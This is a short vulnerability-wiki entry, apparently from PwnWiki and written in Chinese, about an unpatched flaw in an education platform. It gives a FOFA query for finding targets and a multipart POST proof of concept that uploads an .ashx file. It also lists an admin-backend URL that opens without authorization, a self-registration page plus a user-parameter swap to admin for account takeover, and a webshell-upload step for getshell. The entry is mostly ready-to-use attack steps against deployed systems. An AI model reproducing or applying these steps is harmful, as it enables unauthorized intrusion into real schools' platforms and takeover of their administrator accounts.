Loading
0

智慧教育平台0day

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

FOFA

"/Widget/common/Service/CommonWidgetService.asmx/Categorylist"

Xnip2021-03-27 21-45-21.jpg

任意文件上传漏洞

/SmartMobile/micropage/UpLoad/FilesUpLoadHandler.ashx

使用该Payload后返回任意内容即漏洞存在。

POC

Post:
 
------WebKitFormBoundaryxJBEcLK1xdylqBhP
Content-Disposition: form-data;name="fileType"
 
2222.ashx
------WebKitFormBoundaryxJBEcLK1xdylqBhP
Content-Disposition: form-data;name="file"; filename="2222.jpg"
Content-Type: image/jpeg
 
1
------WebKitFormBoundaryxJBEcLK1xdylqBhP—

通过构造的POC成功上传文件。

未经授权访问漏洞

/SmartMobile/MobileIndex.aspx?uname=admin&orgId=0

直接进入管理员后台,需要登录的提示绑定账号,这时候需要注册一个账号登录。

任意用户注册漏洞

 Module/SSO/SJS_Register.aspx

漏洞利用

注册成功后,登录到用户主页

http://xxx.xxx.xxx/Module/PersonalCenter/Default.aspx?user=test123

修改user=admin,发现界面发生变化,用户变为管理员

http://xxx.xxx.xxx/Module/PersonalCenter/Default.aspx?user=admin

进入管理员后台页面

http://xxx.xxx.xxx/SmartMobile/MobileIndex.aspx?uname=admin&orgId=0

Getshell

CMS图片上传没有过滤,修改fileType并且上传Webshell即可。

免费、自由、人人可编辑的漏洞库--PwnWiki.com